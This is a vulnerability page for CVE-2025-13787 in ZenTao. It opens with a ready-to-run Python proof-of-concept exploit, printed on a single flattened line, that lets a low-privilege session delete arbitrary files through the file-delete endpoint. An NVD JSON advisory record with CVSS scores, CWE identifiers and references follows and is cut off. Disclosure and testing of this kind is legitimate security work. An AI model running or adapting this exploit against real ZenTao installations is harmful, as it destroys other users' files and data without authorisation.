CVE-2025-13787

import requests import sys # CVE-2025-13787 PoC - ZenTao Improper Privilege Management in file::delete # Target: ZenTao <= 21.7.6-8564 def exploit_file_deletion(base_url, session_cookie, target_file_id): """ Exploit improper privilege management in ZenTao file::delete function This PoC demonstrates how a low-privilege user can delete arbitrary files Parameters: - base_url: Target ZenTao installation URL - session_cookie: Valid session cookie of low-privilege user - target_file_id: File ID to delete (can belong to other users) """ # Target endpoint for file deletion endpoint = f"{base_url}/file-delete-{target_file_id}.html" # Alternative endpoint format # endpoint = f"{base_url}/file-delete?fileID={target_file_id}" headers = { 'Cookie': session_cookie, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Referer': f"{base_url}/file-browse-" } try: # Send deletion request response = requests.get(endpoint, headers=headers, timeout=10) # Check response for success indicators if response.status_code == 200: if 'success' in response.text.lower() or 'deleted' in response.text.lower(): print(f"[!] File {target_file_id} deleted successfully!") return True else: print(f"[*] Request sent, file may or may not be deleted") return None else: print(f"[*] Response status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False def main(): if len(sys.argv) < 4: print("Usage: python cve-2025-13787.py <base_url> <session_cookie> <file_id>") print("Example: python cve-2025-13787.py http://target.com 'zentaosid=abc123' 999") sys.exit(1) base_url = sys.argv[1].rstrip('/') session_cookie = sys.argv[2] file_id = sys.argv[3] print(f"[*] Targeting: {base_url}") print(f"[*] Exploiting CVE-2025-13787 - ZenTao Improper Privilege Management") result = exploit_file_deletion(base_url, session_cookie, file_id) if result: print("[+] Vulnerability confirmed!") else: print("[-] Exploitation failed or target not vulnerable") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-13787", "sourceIdentifier": "[email protected]", "published": "2025-11-30T11:15:48.567", "lastModified": "2025-12-04T16:44:07.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in ZenTao up to 21.7.6-8564. The affected element is the function file::delete of the file module/file/control.php of the component File Handler. Executing manipulation of the argument fileID can lead to improper privilege management. It is possible to launch the attack remotely. Upgrading to version 21.7.7 is sufficient to fix this issue. You should upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "baseScore": 5.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zentao:zentao:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.7.7", "matchCriteriaId": "725BA33D-560F-40A8-A4F0-605DF48E9A53"}]}]}], "references": [{"url": "https://github.com/ez-lbz/ez-lbz.github.io/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/ez-lbz/ez-lbz.github.io/issues/1#issuecomment-3540423868", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.333791", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333791", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.689892", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.zentao.net/extension-buyext-1601-download.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ez-lbz/ez-lbz.github.io/issues/1", "source": "134c7 ... (truncated)